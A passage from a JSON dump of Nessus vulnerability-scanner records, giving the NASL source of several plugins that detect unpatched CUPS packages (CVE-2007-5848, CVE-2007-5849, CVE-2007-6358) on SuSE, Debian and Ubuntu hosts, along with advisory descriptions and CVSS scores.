patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes a buffer overflow that can be exploited by users\nthat are allowed to configure CUPS. (CVE-2007-5848)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2007-5848.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 4805.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/12/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/01/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:1, reference:\"cups-1.1.23-40.35\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, reference:\"cups-client-1.1.23-40.35\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, reference:\"cups-devel-1.1.23-40.35\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, reference:\"cups-libs-1.1.23-40.35\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, cpu:\"x86_64\", reference:\"cups-libs-32bit-1.1.23-40.35\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, reference:\"cups-1.1.23-40.35\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, reference:\"cups-client-1.1.23-40.35\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, reference:\"cups-devel-1.1.23-40.35\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, reference:\"cups-libs-1.1.23-40.35\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, cpu:\"x86_64\", reference:\"cups-libs-32bit-1.1.23-40.35\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:02:14", "description": "This update fixes a buffer overflow that can be exploited by users\nthat are allowed to configure CUPS. (CVE-2007-5848)", "edition": 23, "published": "2009-09-24T00:00:00", "title": "SuSE9 Security Update : cups (YOU Patch Number 12016)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-5848"], "modified": "2009-09-24T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE9_12016.NASL", "href": "https://www.tenable.com/plugins/nessus/41175", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(41175);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2007-5848\");\n\n script_name(english:\"SuSE9 Security Update : cups (YOU Patch Number 12016)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 9 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes a buffer overflow that can be exploited by users\nthat are allowed to configure CUPS. (CVE-2007-5848)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2007-5848.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply YOU patch number 12016.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/12/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 9 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SUSE9\", reference:\"cups-1.1.20-108.46\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"cups-client-1.1.20-108.46\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"cups-devel-1.1.20-108.46\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"cups-libs-1.1.20-108.46\")) flag++;\nif (rpm_check(release:\"SUSE9\", cpu:\"x86_64\", reference:\"cups-libs-32bit-9-200712111651\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T01:41:30", "description": "According to its banner, the version of CUPS installed on the remote\nhost contains a stack-based integer overflow in 'asn1_get_string' in\n'backend/snmp.c'. Provided the SNMP backend is configured in CUPS\n(true by default in CUPS 1.2 but not 1.3), an attacker may be able to\nexploit this issue by using specially crafted SNMP responses with\nnegative lengths to overflow a buffer and execute arbitrary code on\nthe affected system.", "edition": 27, "published": "2007-12-19T00:00:00", "title": "CUPS SNMP Back End (backend/snmp.c) asn1_get_string Function Crafted SNMP Response Remote Overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-5849"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:apple:cups"], "id": "CUPS_1_3_5.NASL", "href": "https://www.tenable.com/plugins/nessus/29727", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(29727);\n script_version(\"1.28\");\n script_cvs_date(\"Date: 2018/11/15 20:50:23\");\n\n script_cve_id(\"CVE-2007-5849\");\n script_bugtraq_id(26917);\n\n script_name(english:\"CUPS SNMP Back End (backend/snmp.c) asn1_get_string Function Crafted SNMP Response Remote Overflow\");\n script_summary(english:\"Checks the CUPS server version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote printer service is affected by a buffer overflow\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of CUPS installed on the remote\nhost contains a stack-based integer overflow in 'asn1_get_string' in\n'backend/snmp.c'. Provided the SNMP backend is configured in CUPS\n(true by default in CUPS 1.2 but not 1.3), an attacker may be able to\nexploit this issue by using specially crafted SNMP responses with\nnegative lengths to overflow a buffer and execute arbitrary code on\nthe affected system.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.cups.org/str.php?L2589\");\n # http://www.cups.org/articles.php?L519 (this original link is now 404)\n # https://web.archive.org/web/20071222085434/http://www.cups.org:80/articles.php?L519\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?785685d5\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to CUPS version 1.3.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(189);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/11/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/12/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/12/19\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:cups\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 631);\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:631, embedded:TRUE);\n\nbanner = get_http_banner(port:port, exit_on_fail: 1);\n\n# Get the version.\nsource = \"\";\nversion = \"\";\n\n# - try the Server response header.\nserver = chomp(egrep(string: banner, pattern: \"^Server:\"));\nif (server)\n{\n if (\"CUPS\" >!< server) audit(AUDIT_NOT_LISTEN, \"CUPS\", port);\n\n set_kb_item(name:\"www/\"+port+\"/cups/running\", value:TRUE);\n v = eregmatch(string: server, pattern: \"CUPS/([0-9][^ ]*)\");\n if (!isnull(v))\n {\n version = v[1];\n source = server;\n }\n}\n\n# - look in the title if ServerTokens is 'ProductOnly', 'Major', or 'Minor'.\nif (!version || ereg(pattern:\"^[0-9]+(\\.[0-9]+)?$\", string:version))\n{\n res = tolower(http_get_cache(port:port, item:'/', exit_on_fail:TRUE));\n\n # Check for a few strings to make sure it's CUPS if there's no Server response header.\n if (!server)\n {\n if (\n (\n '<title>home - cups' >< res ||\n '</a> cups is copyright ' >< res ||\n '</a>. cups is copyright ' >< res ||\n '<td class=\"trailer\">cups and the cups logo are trademarks ' >< res ||\n '<small>the common unix printing sytem, cups, and the cups logo are the trademark ' >< res\n ) &&\n (\n '<link rel=\"shortcut icon\" href=\"/images/cups-icon.png\"' >< res ||\n '<td class=\"unsel\"><a href=\"/jobs\">' >< res ||\n '<a class=\"unsel\" href=\"/jobs\">' >< res ||\n '<a href=\"/admin?op=add-printer\">' >< res\n )\n ) set_kb_item(name:\"www/\"+port+\"/cups/running\", value:TRUE);\n else audit(AUDIT_NOT_LISTEN, \"CUPS\", port);\n }\n\n pat = \"<title>.*cups v?([0-9.rcb]+).*</title>\";\n matches = egrep(pattern:pat, string:res);\n if (matches)\n {\n foreach match (split(matches, keep:FALSE))\n {\n item = eregmatch(pattern:pat, string:match);\n if (!isnull(item))\n {\n version = item[1];\n source = match;\n break;\n }\n }\n }\n}\nif (!version) audit(AUDIT_UNKNOWN_WEB_SERVER_VER, \"CUPS\", port);\n\nset_kb_item(name:\"www/cups\", value:TRUE);\nset_kb_item(name:\"cups/\"+port+\"/version\", value:version);\nset_kb_item(name:\"cups/\"+port+\"/source\", value:source);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# nb: STR #2589 says 1.1 is not affected.\nif (\n version =~ \"^1\\.(2|3\\.[0-4])($|[^0-9])\" ||\n version =~ \"^1\\.3(rc|b)\"\n)\n{\n if (report_verbosity > 0)\n {\n report = '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 1.3.5' + \n '\\n';\n\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse if (version =~ \"^(1|1\\.3)($|[^0-9.])\") audit(AUDIT_VER_NOT_GRANULAR, \"CUPS\", port, version);\nelse audit(AUDIT_LISTEN_NOT_VULN, \"CUPS\", port, version);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:44:53", "description": "Several local vulnerabilities have been discovered in the Common UNIX\nPrinting System. The Common Vulnerabilities and Exposures project\nidentifies the following problems :\n\n - CVE-2007-5849\n Wei Wang discovered that an buffer overflow in the SNMP\n backend may lead to the execution of arbitrary code.\n\n - CVE-2007-6358\n Elias Pipping discovered that insecure handling of a\n temporary file in the pdftops.pl script may lead to\n local denial of service. This vulnerability is not\n exploitable in the default configuration.", "edition": 26, "published": "2007-12-27T00:00:00", "title": "Debian DSA-1437-1 : cupsys - several vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-6358", "CVE-2007-5849"], "modified": "2007-12-27T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:4.0", "p-cpe:/a:debian:debian_linux:cupsys"], "id": "DEBIAN_DSA-1437.NASL", "href": "https://www.tenable.com/plugins/nessus/29803", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1437. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(29803);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2007-5849\", \"CVE-2007-6358\");\n script_xref(name:\"DSA\", value:\"1437\");\n\n script_name(english:\"Debian DSA-1437-1 : cupsys - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several local vulnerabilities have been discovered in the Common UNIX\nPrinting System. The Common Vulnerabilities and Exposures project\nidentifies the following problems :\n\n - CVE-2007-5849\n Wei Wang discovered that an buffer overflow in the SNMP\n backend may lead to the execution of arbitrary code.\n\n - CVE-2007-6358\n Elias Pipping discovered that insecure handling of a\n temporary file in the pdftops.pl script may lead to\n local denial of service. This vulnerability is not\n exploitable in the default configuration.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-5849\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-6358\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-5849\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2007/dsa-1437\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the cupsys packages.\n\nThe old stable distribution (sarge) is not affected by CVE-2007-5849.\nThe other issue doesn't warrant an update on it's own and has been\npostponed.\n\nFor the stable distribution (etch), these problems have been fixed in\nversion 1.2.7-4etch2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:cupsys\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:4.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/12/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/12/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"4.0\", prefix:\"cupsys\", reference:\"1.2.7-4etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"cupsys-bsd\", reference:\"1.2.7-4etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"cupsys-client\", reference:\"1.2.7-4etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"cupsys-common\", reference:\"1.2.7-4etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"cupsys-dbg\", reference:\"1.2.7-4etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libcupsimage2\", reference:\"1.2.7-4etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libcupsimage2-dev\", reference:\"1.2.7-4etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libcupsys2\", reference:\"1.2.7-4etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libcupsys2-dev\", reference:\"1.2.7-4etch2\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libcupsys2-gnutls10\", reference:\"1.2.7-4etch2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T15:44:07", "description": "Wei Wang discovered that the SNMP discovery backend did not correctly\ncalculate the length of strings. If a user were tricked into scanning\nfor printers, a remote attacker could send a specially crafted packet\nand possibly execute arbitrary code.\n\nElias Pipping discovered that temporary files were not handled safely\nin certain situations when converting PDF to PS. A local attacker\ncould cause a denial of service.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2008-01-10T00:00:00", "title": "Ubuntu 6.06 LTS / 6.10 / 7.04 / 7.10 : cupsys vulnerabilities (USN-563-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-6358", "CVE-2007-5849"], "modified": "2008-01-10T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:7.10", "p-cpe:/a:canonical:ubuntu_linux:cupsys-common", "p-cpe:/a:canonical:ubuntu_linux:libcupsys2-gnutls10", "cpe:/o:canonical:ubuntu_linux:6.10", "p-cpe:/a:canonical:ubuntu_linux:cupsys-client", "p-cpe:/a:canonical:ubuntu_linux:libcupsys2-dev", "p-cpe:/a:canonical:ubuntu_linux:cupsys-bsd", "p-cpe:/a:canonical:ubuntu_linux:libcupsimage2-dev", "p-cpe:/a:canonical:ubuntu_linux:cupsys", "p-cpe:/a:canonical:ubuntu_linux:libcupsys2", "cpe:/o:canonical:ubuntu_linux:7.04", "p-cpe:/a:canonical:ubuntu_linux:libcupsimage2", "cpe:/o:canonical:ubuntu_linux:6.06:-:lts"], "id": "UBUNTU_USN-563-1.NASL", "href": "https://www.tenable.com/plugins/nessus/29919", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-563-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(29919);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2007-5849\", \"CVE-2007-6358\");\n script_bugtraq_id(26917);\n script_xref(name:\"USN\", value:\"563-1\");\n\n script_name(english:\"Ubuntu 6.06 LTS / 6.10 / 7.04 / 7.10 : cupsys vulnerabilities (USN-563-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Wei Wang discovered that the SNMP discovery backend did not correctly\ncalculate the length of strings. If a user were tricked into scanning\nfor printers, a remote attacker could send a specially crafted packet\nand possibly execute arbitrary code.\n\nElias Pipping discovered that temporary files were not handled safely\nin certain situations when converting PDF to PS. A local attacker\ncould cause a denial of service.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/563-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:cupsys\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:cupsys-bsd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:cupsys-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:cupsys-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libcupsimage2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libcupsimage2-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libcupsys2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libcupsys2-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libcupsys2-gnutls10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.06:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:7.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:7.10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/01/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/01/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2008-2019 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(6\\.06|6\\.10|7\\.04|7\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 6.06 / 6.10 / 7.04 / 7.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"6.06\", pkgname:\"cupsys\", pkgver:\"1.2.2-0ubuntu0.6.06.6\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"cupsys-bsd\", pkgver:\"1.2.2-0ubuntu0.6.06.6\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"cupsys-client\", pkgver:\"1.2.2-0ubuntu0.6.06.6\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libcupsimage2\", pkgver:\"1.2.2-0ubuntu0.6.06.6\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libcupsimage2-dev\", pkgver:\"1.2.2-0ubuntu0.6.06.6\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libcupsys2\", pkgver:\"1.2.2-0ubuntu0.6.06.6\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libcupsys2-dev\", pkgver:\"1.2.2-0ubuntu0.6.06.6\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libcupsys2-gnutls10\", pkgver:\"1.2.2-0ubuntu0.6.06.6\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"cupsys\", pkgver:\"1.2.4-2ubuntu3.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"cupsys-bsd\", pkgver:\"1.2.4-2ubuntu3.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"cupsys-client\", pkgver:\"1.2.4-2ubuntu3.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"cupsys-common\", pkgver:\"1.2.4-2ubuntu3.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"libcupsimage2\", pkgver:\"1.2.4-2ubuntu3.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"libcupsimage2-dev\", pkgver:\"1.2.4-2ubuntu3.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"libcupsys2\", pkgver:\"1.2.4-2ubuntu3.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"libcupsys2-dev\", pkgver:\"1.2.4-2ubuntu3.2\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"cupsys\", pkgver:\"1.2.8-0ubuntu8.2\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"cupsys-bsd\", pkgver:\"1.2.8-0ubuntu8.2\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"cupsys-client\", pkgver:\"1.2.8-0ubuntu8.2\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"cupsys-common\", pkgver:\"1.2.8-0ubuntu8.2\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"libcupsimage2\", pkgver:\"1.2.8-0ubuntu8.2\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"libcupsimage2-dev\", pkgver:\"1.2.8-0ubuntu8.2\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"libcupsys2\", pkgver:\"1.2.8-0ubuntu8.2\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"libcupsys2-dev\", pkgver:\"1.2.8-0ubuntu8.2\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"cupsys\", pkgver:\"1.3.2-1ubuntu7.3\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"cupsys-bsd\", pkgver:\"1.3.2-1ubuntu7.3\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"cupsys-client\", pkgver:\"1.3.2-1ubuntu7.3\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"cupsys-common\", pkgver:\"1.3.2-1ubuntu7.3\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"libcupsimage2\", pkgver:\"1.3.2-1ubuntu7.3\")) flag++;\nif 